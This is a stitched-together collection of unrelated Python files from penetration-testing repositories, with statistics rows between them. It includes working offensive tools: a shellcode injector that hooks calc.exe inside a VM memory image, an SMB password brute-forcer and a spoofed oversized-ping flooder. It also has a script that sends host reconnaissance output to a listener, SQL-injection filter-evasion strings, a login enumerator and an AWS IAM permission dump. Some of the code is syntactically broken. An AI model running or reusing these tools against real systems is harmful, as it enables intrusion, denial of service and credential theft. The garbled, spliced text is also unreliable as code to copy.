string = "TaPoGeTaBiGePoHfTmGeYbAtPtHoPoTaAuPtGeAuYbGeBiHoTaTmPtHoTmGePoAuGeErTaBiHoAuRnTmPbGePoHfTmGeTmRaTaBiPoTmPtHoTmGeAuYbGeTbGeLuTmPtTmPbTbOsGePbTmTaLuPtGeAuYbGeAuPbErTmPbGeTaPtGePtTbPoAtPbTmGeTbPtErGePoAuGeYbTaPtErGePoHfTmGeHoTbAtBiTmBiGeLuAuRnTmPbPtTaPtLuGePoHfTaBiGeAuPbErTmPbPdGeTbPtErGePoHfTaBiGePbTmYbTmPbBiGeTaPtGeTmTlAtTbOsGeIrTmTbBiAtPbTmGePoAuGePoHfTmGePbTmOsTbPoTaAuPtBiGeAuYbGeIrTbPtGeRhGeBiAuHoTaTbOsGeTbPtErGeHgAuOsTaPoTaHoTbOsGeRhGeTbPtErGePoAuGePoHfTmGeTmPtPoTaPbTmGeAtPtTaRnTmPbBiTmGeTbBiGeTbGeFrHfAuOsTmPd"
n=2
list = []
answer = []
[list.append(string[i:i+n]) for i in range(0, len(string), n)]
print set(list)
periodic ={"Pb": 82, "Tl": 81, "Tb": 65, "Ta": 73, "Po": 84, "Ge": 32, "Bi": 83, "Hf": 72, "Tm": 69, "Yb": 70, "At": 85, "Pt": 78, "Ho": 67, "Au": 79, "Er": 68, "Rn": 86, "Ra": 88, "Lu": 71, "Os": 76, "Tl": 81, "Pd": 46, "Rh": 45, "Fr": 87, "Hg": 80, "Ir": 77}
for value in list:
if value in periodic:
answer.append(chr(periodic[value]))
lastanswer = ''.join(answer)
print lastanswer
#it is the function of science to discover the existence of a general reign of order in nature and to find the causes governing this order and this refers in equal measure to the relations of man - social and political - and to the entire universe as a whole.
| 61.857143 | 529 | 0.764973 |
cybersecurity-penetration-testing | import sys
import struct
# Inject shellcode into a suspended VM's memory image (VMware .vmem) using
# Volatility 2.x (Python 2): find free slack space inside calc.exe, write the
# shellcode there, then overwrite the '=' button handler with a trampoline
# that jumps to it.
# Virtual address of calc.exe's '=' button handler (target of the hook).
equals_button = 0x01005D51
memory_file = "/Users/justin/Documents/Virtual Machines.localized/Windows Server 2003 Standard Edition.vmwarevm/564d9400-1cb2-63d6-722b-4ebe61759abd.vmem"
slack_space = None
trampoline_offset = None
# read in our shellcode
sc_fd = open("cmeasure.bin","rb")
sc = sc_fd.read()
sc_fd.close()
# Bring Volatility onto the path and bootstrap its plugin/config machinery.
sys.path.append("/Downloads/volatility-2.3.1")
import volatility.conf as conf
import volatility.registry as registry
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)
config.parse_options()
config.PROFILE = "Win2003SP2x86"
config.LOCATION = "file://%s" % memory_file
import volatility.plugins.taskmods as taskmods
# Walk the process list looking for calc.exe.
p = taskmods.PSList(config)
for process in p.calculate():
    if str(process.ImageFileName) == "calc.exe":
        print "[*] Found calc.exe with PID %d" % process.UniqueProcessId
        print "[*] Hunting for physical offsets...please wait."
        address_space = process.get_process_address_space()
        pages = address_space.get_available_pages()
        for page in pages:
            # Translate the page's virtual address to a physical file offset.
            physical = address_space.vtop(page[0])
            if physical is not None:
                if slack_space is None:
                    fd = open(memory_file,"r+")
                    fd.seek(physical)
                    buf = fd.read(page[1])
                    try:
                        # A run of NULs long enough to hold the shellcode.
                        offset = buf.index("\x00" * len(sc))
                        slack_space = page[0] + offset
                        print "[*] Found good shellcode location!"
                        print "[*] Virtual address: 0x%08x" % slack_space
                        print "[*] Physical address: 0x%08x" % (physical + offset)
                        print "[*] Injecting shellcode."
                        fd.seek(physical + offset)
                        fd.write(sc)
                        fd.flush()
                        # create our trampoline: mov ebx, <addr>; jmp ebx
                        tramp = "\xbb%s" % struct.pack("<L", page[0] + offset)
                        tramp += "\xff\xe3"
                        if trampoline_offset is not None:
                            break
                    except:
                        # No suitable NUL run in this page; try the next one.
                        pass
                    fd.close()
            # check for our target code location
            if page[0] <= equals_button and equals_button < ((page[0] + page[1])-7):
                # calculate virtual offset
                v_offset = equals_button - page[0]
                # now calculate physical offset
                trampoline_offset = physical + v_offset
                print "[*] Found our trampoline target at: 0x%08x" % (trampoline_offset)
        if slack_space is not None:
            break
# NOTE(review): if no slack space was ever found, `tramp`/`trampoline_offset`
# are undefined here and this block raises NameError -- confirm intended.
print "[*] Writing trampoline..."
fd = open(memory_file, "r+")
fd.seek(trampoline_offset)
fd.write(tramp)
fd.close()
print "[*] Done injecting code."
PenetrationTestingScripts | import base64
import re
try:
import hashlib
hash_md4 = hashlib.new("md4")
hash_md5 = hashlib.md5()
except ImportError:
# for Python << 2.5
import md4
import md5
hash_md4 = md4.new()
hash_md5 = md5.new()
# Import SOCKS module if it exists, else standard socket module socket
try:
import SOCKS; socket = SOCKS; del SOCKS # import SOCKS as socket
from socket import getfqdn; socket.getfqdn = getfqdn; del getfqdn
except ImportError:
import socket
from socket import _GLOBAL_DEFAULT_TIMEOUT
# Public API of this module: the rsync client class only.
__all__ = ["rsync"]
# The standard rsync server control port
RSYNC_PORT = 873
# The sizehint parameter passed to readline() calls
MAXLINE = 8192
# Module-level default; instances set their own value after connect().
protocol_version = 0
# Exception raised when an error or invalid response is received
class Error(Exception): pass
# All exceptions (hopefully) that may be raised here and that aren't
# (always) programming errors on our side
all_errors = (Error, IOError, EOFError)
# Line terminators for rsync
CRLF = '\r\n'
LF = '\n'
# The class itself
class rsync:
'''An rsync client class.
To create a connection, call the class using these arguments:
host, module, user, passwd
All arguments are strings, and have default value ''.
Then use self.connect() with optional host and port argument.
'''
debugging = 0
host = ''
port = RSYNC_PORT
maxline = MAXLINE
sock = None
file = None
server_protocol_version = None
# Initialization method (called by class instantiation).
# Initialize host to localhost, port to standard rsync port
# Optional arguments are host (for connect()),
# and module, user, passwd (for login())
def __init__(self, host='', module='', user='', passwd='',port=873,
timeout=_GLOBAL_DEFAULT_TIMEOUT):
self.timeout = timeout
if host:
self.connect(host)
if module and user and passwd:
self.login(module, user, passwd)
    def connect(self, host='', port=0, timeout=-999):
        '''Connect to host. Arguments are:
        - host: hostname to connect to (string, default previous host)
        - port: port to connect to (integer, default previous port)
        The -999 timeout is a sentinel meaning "keep the current timeout".
        '''
        if host != '':
            self.host = host
        if port > 0:
            self.port = port
        if timeout != -999:
            self.timeout = timeout
        self.sock = socket.create_connection((self.host, self.port), self.timeout)
        self.af = self.sock.family
        # Buffered file wrapper consumed by getline()/readline().
        self.file = self.sock.makefile('rb')
        # The daemon greets first, e.g. '@RSYNCD: 31.0'.
        self.server_protocol_version = self.getresp()
        # NOTE(review): this keeps only the LAST TWO characters of the
        # greeting (a string, not a number) -- confirm before comparing it
        # against integers elsewhere.
        self.protocol_version = self.server_protocol_version[-2:]
        return self.server_protocol_version
def set_debuglevel(self, level):
'''Set the debugging level.
The required argument level means:
0: no debugging output (default)
1: print commands and responses but not body text etc.
'''
self.debugging = level
debug = set_debuglevel
# Internal: send one line to the server, appending LF
def putline(self, line):
line = line + LF
if self.debugging > 1: print '*put*', line
self.sock.sendall(line)
# Internal: return one line from the server, stripping LF.
# Raise EOFError if the connection is closed
def getline(self):
line = self.file.readline(self.maxline + 1)
if len(line) > self.maxline:
raise Error("got more than %d bytes" % self.maxline)
if self.debugging > 1:
print '*get*', line
if not line: raise EOFError
if line[-2:] == CRLF: line = line[:-2]
elif line[-1:] in CRLF: line = line[:-1]
return line
# Internal: get a response from the server, which may possibly
# consist of multiple lines. Return a single string with no
# trailing CRLF. If the response consists of multiple lines,
# these are separated by '\n' characters in the string
def getmultiline(self):
line = self.getline()
return line
# Internal: get a response from the server.
# Raise various errors if the response indicates an error
def getresp(self):
resp = self.getmultiline()
if self.debugging: print '*resp*', resp
if resp.find('ERROR') != -1:
raise Error, resp
else:
return resp
def sendcmd(self, cmd):
'''Send a command and return the response.'''
self.putline(cmd)
return self.getresp()
def login(self, module='', user = '', passwd = ''):
if not user: user = 'www'
if not passwd: passwd = 'www'
if not module: module = 'www'
self.putline(self.server_protocol_version)
# self.putline('@RSYNCD: 28.0')
# self.protocol_version = 28
resp = self.sendcmd(module)
challenge = resp[resp.find('AUTHREQD ')+9:]
if self.protocol_version >= 30:
md5=hashlib.md5()
md5.update(passwd)
md5.update(challenge)
hash = base64.b64encode(md5.digest())
else:
md4=hashlib.new('md4')
tmp = '\0\0\0\0' + passwd + challenge
md4.update(tmp)
hash = base64.b64encode(md4.digest())
response, number = re.subn(r'=+$','',hash)
print response
resp = self.sendcmd(user + ' ' + response)
if resp.find('OK') == -1:
raise Error, resp
return resp
def getModules(self):
'''Get modules on the server'''
print self.server_protocol_version
self.putline(self.server_protocol_version)
resp = self.sendcmd('')
print resp
return resp
def close(self):
'''Close the connection without assuming anything about it.'''
self.putline('')
if self.file is not None:
self.file.close()
if self.sock is not None:
self.sock.close()
self.file = self.sock = None
| 29.625641 | 82 | 0.603584 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from printers import printPink,printGreen
from impacket.smbconnection import *
from multiprocessing.dummy import Pool
from threading import Thread
class smb_burp(object):
    """Brute force SMB logins (Python 2, Impacket) using the
    'user:pass' pairs listed in conf/smb.conf."""
    def __init__(self,c):
        # c is the framework config object; file2list() loads one
        # credential pair per line.
        self.config=c
        self.lock=threading.Lock()
        self.result=[]
        self.lines=self.config.file2list("conf/smb.conf")
    def smb_connect(self,ip,username,password):
        # Return 1 when the pair authenticates against ip, 0 otherwise.
        crack =0
        try:
            smb = SMBConnection('*SMBSERVER', ip)
            smb.login(username,password)
            smb.logoff()
            crack =1
        except Exception, e:
            # Failed login; the lock serialises console output across
            # pool threads.
            self.lock.acquire()
            print "%s smb 's %s:%s login fail " %(ip,username,password)
            self.lock.release()
        return crack
    def smb_l(self,ip,port):
        # Try every credential pair against one host; stop at first hit.
        try:
            for data in self.lines:
                username=data.split(':')[0]
                password=data.split(':')[1]
                if self.smb_connect(ip,username,password)==1:
                    self.lock.acquire()
                    printGreen("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
                    self.result.append("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
                    self.lock.release()
                    break
        except Exception,e:
            # NOTE(review): swallows all errors (malformed conf lines,
            # network failures) silently -- confirm this is intentional.
            pass
    def run(self,ipdict,pinglist,threads,file):
        # Crack every "ip:port" entry under ipdict['smb'] with a thread
        # pool, then append any hits to the result file.
        if len(ipdict['smb']):
            printPink("crack smb now...")
            print "[*] start crack smb serice %s" % time.ctime()
            starttime=time.time()
            pool=Pool(threads)
            for ip in ipdict['smb']:
                pool.apply_async(func=self.smb_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
            pool.close()
            pool.join()
            print "[*] stop smb serice %s" % time.ctime()
            print "[*] crack smb done,it has Elapsed time:%s " % (time.time()-starttime)
            for i in xrange(len(self.result)):
                self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'smb': ['10.211.55.3:445']}
pinglist=['101.201.177.35']
test=smb_burp(c)
test.run(ipdict,pinglist,50,file="../result/test") | 32.833333 | 125 | 0.529363 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-10
# @File : __init__.py.py
# @Desc : ""
| 16 | 27 | 0.481481 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from bluetooth import *
def rfcommCon(addr, port):
    # Probe one RFCOMM channel: a successful connect means it is open.
    sock = BluetoothSocket(RFCOMM)
    try:
        sock.connect((addr, port))
        print '[+] RFCOMM Port ' + str(port) + ' open'
        sock.close()
    except Exception, e:
        print '[-] RFCOMM Port ' + str(port) + ' closed'
# Scan RFCOMM channels 1-29 on the target Bluetooth address.
for port in range(1, 30):
    rfcommCon('00:16:38:DE:AD:11', port)
| 20.210526 | 56 | 0.569652 |
cybersecurity-penetration-testing | from scapy.all import *
# Oversized-ICMP flooder: a spoofed-source jumbo ping, sent 21 times total.
spoofed = IP(src="192.168.0.99", dst="192.168.0.11")
jumbo_ping = spoofed / ICMP() / ("m" * 60000)
# One initial send, then twenty repeats (matches the original behaviour).
send(jumbo_ping)
for _ in range(20):
    send(jumbo_ping)
Hands-On-AWS-Penetration-Testing-with-Kali-Linux | #!/usr/bin/env python3
"""Dump IAM account authorization details and derive the calling user's
effective policy documents (inline, attached, and group-inherited)."""
import boto3
import json

session = boto3.session.Session(profile_name='Test', region_name='us-west-2')
client = session.client('iam')

user_details = []
group_details = []
role_details = []
policy_details = []


def _collect_page(page):
    """Append one get_account_authorization_details page to the buckets."""
    if page.get('UserDetailList'):
        user_details.extend(page['UserDetailList'])
    if page.get('GroupDetailList'):
        group_details.extend(page['GroupDetailList'])
    if page.get('RoleDetailList'):
        role_details.extend(page['RoleDetailList'])
    if page.get('Policies'):
        policy_details.extend(page['Policies'])


# First page, then follow pagination markers until exhausted.
response = client.get_account_authorization_details()
_collect_page(response)
while response['IsTruncated']:
    response = client.get_account_authorization_details(Marker=response['Marker'])
    _collect_page(response)

# Persist the raw snapshots for offline analysis.
with open('./users.json', 'w+') as f:
    json.dump(user_details, f, indent=4, default=str)
with open('./groups.json', 'w+') as f:
    json.dump(group_details, f, indent=4, default=str)
with open('./roles.json', 'w+') as f:
    json.dump(role_details, f, indent=4, default=str)
with open('./policies.json', 'w+') as f:
    json.dump(policy_details, f, indent=4, default=str)

# Locate the record belonging to the caller.
username = client.get_user()['User']['UserName']
current_user = None
for user in user_details:
    if user['UserName'] == username:
        current_user = user
        break

my_policies = []

# Inline policies attached directly to the user.
if current_user.get('UserPolicyList'):
    for policy in current_user['UserPolicyList']:
        my_policies.append(policy['PolicyDocument'])

# Managed policies attached directly to the user.
# BUG FIX: the original iterated user['AttachedManagedPolicies'] -- the
# stale loop variable from the search above -- instead of current_user.
if current_user.get('AttachedManagedPolicies'):
    for managed_policy in current_user['AttachedManagedPolicies']:
        policy_arn = managed_policy['PolicyArn']
        for policy_detail in policy_details:
            if policy_detail['Arn'] == policy_arn:
                default_version = policy_detail['DefaultVersionId']
                for version in policy_detail['PolicyVersionList']:
                    if version['VersionId'] == default_version:
                        my_policies.append(version['Document'])
                        break
                break

# Policies inherited through group membership (inline + managed).
if current_user.get('GroupList'):
    for user_group in current_user['GroupList']:
        for group in group_details:
            if group['GroupName'] == user_group:
                if group.get('GroupPolicyList'):
                    for inline_policy in group['GroupPolicyList']:
                        my_policies.append(inline_policy['PolicyDocument'])
                if group.get('AttachedManagedPolicies'):
                    for managed_policy in group['AttachedManagedPolicies']:
                        policy_arn = managed_policy['PolicyArn']
                        for policy in policy_details:
                            if policy['Arn'] == policy_arn:
                                default_version = policy['DefaultVersionId']
                                for version in policy['PolicyVersionList']:
                                    if version['VersionId'] == default_version:
                                        my_policies.append(version['Document'])
                                        break
                                break

with open('./my-user-permissions.json', 'w+') as f:
    json.dump(my_policies, f, indent=4, default=str)
owtf | """
PASSIVE Plugin for Testing for Error Code (OWASP-IG-006)
https://www.owasp.org/index.php/Testing_for_Error_Code_%28OWASP-IG-006%29
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper

DESCRIPTION = "Google Hacking for Error codes"


def run(PluginInfo):
    """Render a link list of online resources for error-code dorking."""
    dork_links = get_resources("PassiveErrorMessagesLnk")
    return plugin_helper.resource_linklist("Online Resources", dork_links)
| 29.4 | 75 | 0.767033 |
Effective-Python-Penetration-Testing | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
class TestspiderPipeline(object):
    """Pass-through Scrapy item pipeline (placeholder)."""
    def process_item(self, item, spider):
        """Return the item unchanged so it continues down the pipeline."""
        return item
| 23.25 | 65 | 0.706897 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Placeholder plugin: emit a short informational HTML snippet."""
    return plugin_helper.HtmlString("Intended to show helpful info in the future")
| 23.777778 | 85 | 0.765766 |
owtf | """
owtf.managers.worker
~~~~~~~~~~~~~~~~~~~~
Manage workers and assign work to them.
"""
import logging
import multiprocessing
import signal
from time import strftime
try:
import queue
except ImportError:
import Queue as queue
import psutil
from owtf.db.session import get_scoped_session
from owtf.lib.exceptions import InvalidWorkerReference
from owtf.managers.worklist import get_work_for_target
from owtf.workers.local import LocalWorker
from owtf.settings import MIN_RAM_NEEDED, PROCESS_PER_CORE
from owtf.utils.error import abort_framework
from owtf.utils.process import check_pid, _signal_process
from owtf.utils.signals import workers_finish, owtf_start
__all__ = ["worker_manager"]
# For psutil
TIMEOUT = 3
class WorkerManager(object):
def __init__(self):
# Complicated stuff to keep everything Pythonic and from blowing up
def handle_signal(sender, **kwargs):
self.on_start(sender, **kwargs)
self.handle_signal = handle_signal
owtf_start.connect(handle_signal)
self.worklist = [] # List of unprocessed (plugin*target)
self.workers = [] # list of worker and work (worker, work)
self.session = get_scoped_session()
self.spawn_workers()
def on_start(self, sender, **kwargs):
self.keep_working = not kwargs["args"]["nowebui"]
def get_allowed_process_count(self):
"""Get the number of max processes
:return: max number of allowed processes
:rtype: `int`
"""
cpu_count = multiprocessing.cpu_count()
return PROCESS_PER_CORE * cpu_count
def get_task(self):
"""Fetch task dict for worker
:return: Work dict
:rtype: `dict`
"""
work = None
avail = psutil.virtual_memory().available
if int(avail / 1024 / 1024) > MIN_RAM_NEEDED:
work = get_work_for_target(self.session, self.targets_in_use())
else:
logging.warn("Not enough memory to execute a plugin")
return work
def spawn_workers(self):
"""This function spawns the worker process and give them initial work
:return: None
:rtype: None
"""
# Check if maximum limit of processes has reached
while len(self.workers) < self.get_allowed_process_count():
self.spawn_worker()
if not len(self.workers):
abort_framework("Zero worker processes created because of lack of memory")
def spawn_worker(self, index=None):
"""Spawn a new worker
:param index: Worker index
:type index: `int`
:return: None
:rtype: None
"""
w = LocalWorker(
input_q=multiprocessing.Queue(),
output_q=multiprocessing.Queue(),
index=index,
)
worker_dict = {"worker": w, "work": (), "busy": False, "paused": False}
if index is not None:
logging.debug("Replacing worker at index %d", index)
self.workers[index] = worker_dict
else:
logging.debug("Adding a new worker")
self.workers.append(worker_dict)
w.start()
def targets_in_use(self):
target_ids = []
for item in self.workers:
try:
target_ids.append(item["work"][0]["id"])
except IndexError:
continue
return target_ids
    def manage_workers(self):
        """This function manages workers, it polls on each queue of worker
        checks if it has done his work and then gives it new work
        if there is one

        :return: None
        :rtype: None
        """
        # Loop while there is some work in worklist
        for k in range(0, len(self.workers)):
            # A non-empty output queue means the worker finished its job;
            # a dead pid means the worker crashed and must be respawned.
            if (
                not self.workers[k]["worker"].output_q.empty()
                or not check_pid(self.workers[k]["worker"].pid)
            ):
                if check_pid(self.workers[k]["worker"].pid):
                    # Assign target, plugin from tuple work and empty the tuple
                    self.workers[k]["work"] = ()
                    self.workers[k]["busy"] = False  # Worker is IDLE
                    self.workers[k]["start_time"] = "NA"
                else:
                    logging.info(
                        "Worker with name %s and pid %d seems dead",
                        self.workers[k]["worker"].name,
                        self.workers[k]["worker"].pid,
                    )
                    # Replace the dead worker in place at the same index.
                    self.spawn_worker(index=k)
                work_to_assign = self.get_task()
                if work_to_assign:
                    logging.info(
                        "Work assigned to %s with pid %d",
                        self.workers[k]["worker"].name,
                        self.workers[k]["worker"].pid,
                    )
                    # Drain the completed-work marker before handing out
                    # the next job.
                    trash_can = self.workers[k]["worker"].output_q.get()
                    # Assign work ,set target to used,and process to busy
                    self.workers[k]["worker"].input_q.put(work_to_assign)
                    self.workers[k]["work"] = work_to_assign
                    self.workers[k]["busy"] = True
                    self.workers[k]["start_time"] = strftime("%Y/%m/%d %H:%M:%S")
        # Headless (no-web-UI) runs shut down once every worker is idle.
        if not self.keep_working:
            if not self.is_any_worker_busy():
                logging.info("All jobs have been done. Exiting.")
                workers_finish.send(self)
def is_any_worker_busy(self):
"""If a worker is still busy, return True. Return False otherwise.
:return: True if any worker is busy
:return: `bool`
"""
return True in [worker["busy"] for worker in self.workers]
def poison_pill_to_workers(self):
"""This function waits for each worker to complete his work and
send it poison pill (empty work)
:return: None
:rtype: None
"""
for item in self.workers:
# Check if process is doing some work
if item["busy"]:
if item["paused"]:
_signal_process(item["worker"].pid, signal.SIGCONT)
trash = item["worker"].output_q.get()
item["busy"] = False
item["work"] = ()
item["worker"].poison_q.put("DIE")
def join_workers(self):
"""Joins all the workers
:return: None
:rtype: None
"""
for item in self.workers:
item["worker"].join()
def clean_up(self):
"""Cleanup workers
:return: None
:rtype: None
"""
self.poison_pill_to_workers()
self.join_workers()
def exit(self):
"""This function empties the pending work list and aborts all processes
:return: None
:rtype: None
"""
# As worklist is emptied, aborting of plugins will result in
# killing of workers
self.worklist = [] # It is a list
for item in self.workers:
work = item["worker"].poison_q.put("DIE")
_signal_process(item["worker"].pid, signal.SIGINT)
@staticmethod
def _signal_children(parent_pid, psignal):
"""Signal OWTF child processes
:param parent_pid: Parent process PID
:type parent_pid: `int`
:param psignal: Signal to send
:type parent_pid: `int`
:return: None
:rtype: None
"""
def on_terminate(proc):
logging.debug(
"Process %s terminated with exit code %d", proc, proc.returncode
)
parent = psutil.Process(parent_pid)
children = parent.children(recursive=True)
for child in children:
child.send_signal(psignal)
gone, alive = psutil.wait_procs(
children, timeout=TIMEOUT, callback=on_terminate
)
if not alive:
# send SIGKILL
for pid in alive:
logging.debug("Process %d survived SIGTERM; trying SIGKILL", pid)
pid.kill()
gone, alive = psutil.wait_procs(alive, timeout=TIMEOUT, callback=on_terminate)
if not alive:
# give up
for pid in alive:
logging.debug("Process %d survived SIGKILL; giving up", pid)
# NOTE: PSEUDO_INDEX = INDEX + 1
# This is because the list index starts from 0 and in the UI, indices start from 1
def get_worker_details(self, pseudo_index=None):
"""Get worker details
:param pseudo_index: worker index
:type pseudo_index: `int`
:return: Worker details
:rtype: `dict`
"""
if pseudo_index:
try:
temp_dict = dict(self.workers[pseudo_index - 1])
temp_dict["name"] = temp_dict["worker"].name
temp_dict["worker"] = temp_dict["worker"].pid
temp_dict["id"] = pseudo_index
return temp_dict
except IndexError:
raise InvalidWorkerReference(
"No worker process with id: {!s}".format(pseudo_index)
)
else:
worker_temp_list = []
for i, obj in enumerate(self.workers):
temp_dict = dict(self.workers[i])
temp_dict["name"] = temp_dict["worker"].name
temp_dict["worker"] = temp_dict["worker"].pid
temp_dict["id"] = i + 1 # Zero-Index is not human friendly
worker_temp_list.append(temp_dict)
return worker_temp_list
def get_busy_workers(self):
"""Returns number of busy workers
:return: Number of busy workers
:rtype: `int`
"""
count = 0
workers = self.get_worker_details()
for worker in workers:
if worker["busy"] is True:
count += 1
return count
def get_worker_dict(self, pseudo_index):
"""Fetch the worker dict from the list
:param pseudo_index: worker index
:type pseudo_index: `int`
:return: Worker info
:rtype: `dict`
"""
try:
return self.workers[pseudo_index - 1]
except IndexError:
raise InvalidWorkerReference(
"No worker process with id: {!s}".format(pseudo_index)
)
def create_worker(self):
"""Create new worker
:return: None
:rtype: None
"""
self.spawn_worker()
def delete_worker(self, pseudo_index):
"""
This actually deletes the worker :
+ Send SIGINT to the worker
+ Remove it from self.workers so that is is not restarted by
manager cron
"""
worker_dict = self.get_worker_dict(pseudo_index)
if not worker_dict["busy"]:
_signal_process(worker_dict["worker"].pid, signal.SIGINT)
del self.workers[pseudo_index - 1]
else:
raise InvalidWorkerReference(
"Worker with id {!s} is busy".format(pseudo_index)
)
def pause_worker(self, pseudo_index):
"""Pause worker by sending SIGSTOP after verifying the process is running
:param pseudo_index: worker index
:type pseudo_index: `int`
:return: None
:rtype: None
"""
worker_dict = self.get_worker_dict(pseudo_index)
if not worker_dict["paused"]:
self._signal_children(worker_dict["worker"].pid, signal.SIGSTOP)
_signal_process(worker_dict["worker"].pid, signal.SIGSTOP)
worker_dict["paused"] = True
def pause_all_workers(self):
"""Pause all workers by sending SIGSTOP after verifying they are running
:return: None
:rtype: None
"""
for worker_dict in self.workers:
if not worker_dict["paused"]:
self._signal_children(worker_dict["worker"].pid, signal.SIGSTOP)
_signal_process(worker_dict["worker"].pid, signal.SIGSTOP)
worker_dict["paused"] = True
def resume_worker(self, pseudo_index):
"""Resume worker by sending SIGCONT after verifying that process is paused
:param pseudo_index: Worker index
:type pseudo_index: `int`
:return: None
:rtype: None
"""
worker_dict = self.get_worker_dict(pseudo_index)
if worker_dict["paused"]:
self._signal_children(worker_dict["worker"].pid, signal.SIGCONT)
_signal_process(worker_dict["worker"].pid, signal.SIGCONT)
worker_dict["paused"] = False
def resume_all_workers(self):
"""Resume all workers by sending SIGCONT to each one of them after verification
that it is really paused
:return: None
:rtype: None
"""
for worker_dict in self.workers:
if worker_dict["paused"]:
self._signal_children(worker_dict["worker"].pid, signal.SIGCONT)
_signal_process(worker_dict["worker"].pid, signal.SIGCONT)
worker_dict["paused"] = False
def abort_worker(self, pseudo_index):
"""Abort worker i.e kill current command, but the worker process is not
removed, so manager_cron will restart it
:param pseudo_index: pseudo index for the worker
:type pseudo_index: `int`
:return: None
:rtype: None
"""
worker_dict = self.get_worker_dict(pseudo_index)
# You only send SIGINT to worker since it will handle it more
# gracefully and kick the command process's ***
_signal_process(worker_dict["worker"].pid, signal.SIGINT)
worker_manager = WorkerManager()
| 32.769042 | 87 | 0.554537 |
cybersecurity-penetration-testing | import requests
import urllib
import subprocess
from subprocess import PIPE, STDOUT
# Recon commands whose output is exfiltrated via a GET query string.
commands = ['whoami','hostname','uname']
out = {}
for command in commands:
    try:
        p = subprocess.Popen(command, stderr=STDOUT, stdout=PIPE)
        out[command] = p.stdout.read().strip()
    except Exception:
        # Best-effort: skip commands missing on this platform.  Narrowed
        # from a bare except so KeyboardInterrupt/SystemExit still propagate.
        pass
# Ship the collected values as URL query parameters to the listener.
requests.get('http://localhost:8000/index.html?' + urllib.urlencode(out))
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Placeholder plugin: emit a short informational HTML snippet."""
    return plugin_helper.HtmlString("Intended to show helpful info in the future")
| 23.777778 | 85 | 0.765766 |
cybersecurity-penetration-testing | import urllib2
from bs4 import BeautifulSoup
import sys
# First-level and second-level link accumulators.
urls = []
urls2 = []
tarurl = sys.argv[1]
# Depth 1: collect every in-scope link from the target page.
url = urllib2.urlopen(tarurl).read()
soup = BeautifulSoup(url)
for line in soup.find_all('a'):
    newline = line.get('href')
    print line.get('href')
    try:
        if newline[:4] == "http":
            # Absolute URL: keep only links that stay on the target site.
            if tarurl in newline:
                urls.append(str(newline))
        elif newline[:1] == "/":
            # Relative URL: resolve against the target root.
            combline = tarurl+newline
            urls.append(str(combline))
    except:
        # NOTE(review): bare except -- presumably guards against anchors
        # with no href (newline is None), but it hides other errors too.
        pass
# Depth 2: fetch each first-level link and repeat the same extraction.
for uurl in urls:
    url = urllib2.urlopen(uurl).read()
    soup = BeautifulSoup(url)
    for line in soup.find_all('a'):
        newline = line.get('href')
        try:
            if newline[:4] == "http":
                if tarurl in newline:
                    urls2.append(str(newline))
            elif newline[:1] == "/":
                combline = tarurl+newline
                urls2.append(str(combline))
        except:
            pass
# De-duplicate and print the second-level URL set.
urls3 = set(urls2)
for value in urls3:
    print value
Python-Penetration-Testing-for-Developers | subs = []
values = {" ": "%50", "SELECT": "HAVING", "AND": "&&", "OR": "||"}
originalstring = "' UNION SELECT * FROM Users WHERE username = 'admin' OR 1=1 AND username = 'admin';#"
secondoriginalstring = originalstring
for key, value in values.iteritems():
if key in originalstring:
newstring = originalstring.replace(key, value)
subs.append(newstring)
if key in secondoriginalstring:
secondoriginalstring = secondoriginalstring.replace(key, value)
subs.append(secondoriginalstring)
subset = set(subs)
for line in subs:
print line | 35.266667 | 103 | 0.714549 |
cybersecurity-penetration-testing | #brute force passwords
import sys
import urllib
import urllib2
if len(sys.argv) !=3:
print "usage: %s userlist passwordlist" % (sys.argv[0])
sys.exit(0)
filename1=str(sys.argv[1])
filename2=str(sys.argv[2])
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')
url = "http://www.vulnerablesite.com/login.html"
foundusers = []
UnknownStr="Username not found"
for user in userlist:
for password in passwordlist:
data = urllib.urlencode({"username":user})
request = urllib2.urlopen(url,data)
response = request.read()
if(response.find(UnknownStr)>=0)
foundusers.append(user)
request.close()
if len(foundusers)>0:
print "Found Users:\n"
for name in foundusers:
print name+"\n"
else:
print "No users found\n"
| 22 | 60 | 0.682458 |
cybersecurity-penetration-testing | import urllib
from bs4 import BeautifulSoup
import re
domain=raw_input("Enter the domain name ")
url = "http://smartwhois.com/whois/"+str(domain)
ht= urllib.urlopen(url)
html_page = ht.read()
b_object = BeautifulSoup(html_page)
file_text= open("who.txt",'a')
who_is = b_object.body.find('div',attrs={'class' : 'whois'})
who_is1=str(who_is)
for match in re.finditer("Domain Name:",who_is1):
s= match.start()
lines_raw = who_is1[s:]
lines = lines_raw.split("<br/>",150)
i=0
for line in lines :
file_text.writelines(line)
file_text.writelines("\n")
print line
i=i+1
if i==17 :
break
file_text.writelines("-"*50)
file_text.writelines("\n")
file_text.close()
| 17.026316 | 60 | 0.671053 |
owtf | """
Plugin for probing ftp
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = " FTP Probing "
def run(PluginInfo):
    """Run the configured FTP probing commands and dump their output."""
    # Look up the FTP probe command definitions; there is no previous output.
    ftp_probe_resources = get_resources("FtpProbeMethods")
    return plugin_helper.CommandDump(
        "Test Command", "Output", ftp_probe_resources, PluginInfo, []
    )
| 23.428571 | 88 | 0.73607 |
